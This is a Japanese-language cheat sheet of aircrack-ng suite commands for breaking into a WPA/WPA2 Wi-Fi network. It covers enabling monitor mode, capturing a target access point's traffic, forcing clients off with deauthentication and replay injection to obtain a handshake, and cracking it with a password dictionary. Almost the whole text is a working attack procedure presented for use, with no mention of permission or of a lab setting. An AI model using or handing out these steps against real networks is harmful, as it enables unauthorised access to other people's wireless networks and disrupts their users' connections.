①パケット収集
sudo -i
iwconfig ==> Interface の確認 wlan0?
airmon-ng stop wlan0
macchanger --show wlan0 == > 自分のカードMACを確認
airmon-ng start wlan0 ==> monitor mode enabled on mon0 を確認 無ければ wlan0 も可
airodump-ng --encrypt wpa mon0 == > WPA のみを表示 TargetBSSID が決まれば Ctrl + c で止めて Target を何処かへコピーする
(BSSID -85 44 1 0 7 54e. WPA2 CCMP PSK ESSID)
rm output-*.* == > 以前の Data 削除
airodump-ng -c 7 -w output --bssid **:**:**:**:**:** mon0
②インジェクション(別窓)
aireplay-ng -0 10 -a **:**:**:**:**:** mon0 == > -c Station を確認
aireplay-ng -0 5 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0
aireplay-ng -3 -b **:**:**:**:**:** -h **:**:**:**:**:** (自分のカードMAC可) mon0
注釈「You get a message similar to:
The interface MAC (06:13:F7:12:23:4A) doesn't match the specified MAC (-h).
ifconfig ath1 hw ether 00:13:A7:12:3C:5B
This occurs when the source MAC address for injection (specified by -h) is different then your card MAC address. In the case above, the injection MAC of 00:13:A7:12:3C:5B does not match the card MAC of 06:13:F7:12:23:4A. In some cases, but not all, this will cause injection to fail. That is why it gives you this warning. So it is always recommended that your injection MAC match the card MAC address. 」
別窓
aireplay-ng -0 0 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0
③解析
Handshake が①で表示されたら全ての窓を閉じて 有効な辞書(password.lst)で解析する。
aircrack-ng -a 2 -w password.lst output-*.cap
以上 WPAも辞書次第で解析できます。